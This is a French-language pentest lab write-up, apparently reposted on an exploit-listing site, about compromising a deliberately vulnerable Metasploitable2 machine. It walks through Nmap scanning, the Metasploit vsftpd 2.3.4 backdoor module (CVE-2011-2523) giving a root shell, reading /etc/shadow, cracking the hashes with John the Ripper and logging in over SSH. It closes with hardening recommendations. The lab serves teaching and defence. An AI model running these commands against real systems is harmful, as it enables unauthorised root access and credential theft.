Exploit for OS Command Injection in Vsftpd_Project Vsftpd CVE-2011-2523

Name: Exploit for OS Command Injection in Vsftpd_Project Vsftpd CVE-2011-2523
Rating: 5 (147 reviews)
2026-03-24 | CVSS 10.0
## https://sploitus.com/exploit?id=59BAFDCD-5027-5C82-BC59-FC7625DD81DB
# 🔐 Pentest Lab — Metasploitable2

## 📋 Description
Premier lab de test de pénétration réalisé dans un environnement 
isolé et légal. Ce projet documente l'exploitation d'une machine 
volontairement vulnérable (Metasploitable2) depuis Kali Linux.

## 🛠️ Environnement
- **Attaquant** : Kali Linux (Cisco CyberOps)
- **Cible** : Metasploitable2 (192.168.0.10)
- **Réseau** : Lab isolé Docker

## 🔍 Étape 1 — Reconnaissance (Nmap)
Scan des services et versions sur la cible :
```bash
nmap -sV 192.168.0.10
```
### Résultats — Ports ouverts critiques

| Port | Service | Version | Risque |
|------|---------|---------|--------|
| 21 | FTP | vsftpd 2.3.4 | 🔴 Critique |
| 22 | SSH | OpenSSH 4.7p1 | 🟠 Élevé |
| 23 | Telnet | Linux telnetd | 🔴 Critique |
| 80 | HTTP | Apache 2.2.8 | 🟠 Élevé |
| 1524 | Bindshell | root shell | 🔴 Critique |
| 3306 | MySQL | 5.0.51a | 🟠 Élevé |

## 💥 Étape 2 — Exploitation (vsftpd 2.3.4)
**Vulnérabilité** : CVE-2011-2523 — Backdoor dans vsftpd 2.3.4

**Pourquoi ?** En 2011, le code source de vsftpd 2.3.4 a été 
modifié malicieusement. Si le username contient ":)", 
un shell root s'ouvre sur le port 6200.
```bash
msfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.0.10
run
```

### Résultat
```
[+] Backdoor service has been spawned
[+] UID: uid=0(root) gid=0(root)
[*] Command shell session opened
```
✅ Accès root obtenu sur la machine cible !

## 🔑 Étape 3 — Collecte et crack de mots de passe
Récupération du fichier shadow (mots de passe hashés) :
```bash
cat /etc/shadow
```
Crack avec John the Ripper :
```bash
john hashes.txt
```
### Mots de passe trouvés

| Utilisateur | Mot de passe | Méthode |
|-------------|-------------|---------|
| user | user | Single mode |
| msfadmin | msfadmin | Single mode |
| smithy | password | Dictionnaire |

## 🚪 Étape 4 — Accès SSH
Connexion avec les credentials récupérés :
```bash
ssh msfadmin@192.168.0.10
```
✅ Connexion réussie avec le mot de passe cracké !

## ⚠️ Vulnérabilités identifiées
1. **vsftpd 2.3.4** — Backdoor (CVE-2011-2523)
2. **Mots de passe triviaux** — user/user, msfadmin/msfadmin
3. **Telnet actif** — protocole non chiffré
4. **Services obsolètes** — versions non maintenues

## 🛡️ Recommandations
- Mettre à jour tous les services vers des versions récentes
- Utiliser des mots de passe forts (min 12 caractères)
- Désactiver Telnet, utiliser SSH uniquement
- Fermer les ports non nécessaires

## 📚 Outils utilisés
- **Nmap** — Reconnaissance réseau
- **Metasploit** — Framework d'exploitation
- **John the Ripper** — Crack de mots de passe
- **SSH** — Accès distant

## ⚖️ Avertissement légal
Ce lab a été réalisé dans un environnement isolé et légal,
uniquement à des fins éducatives.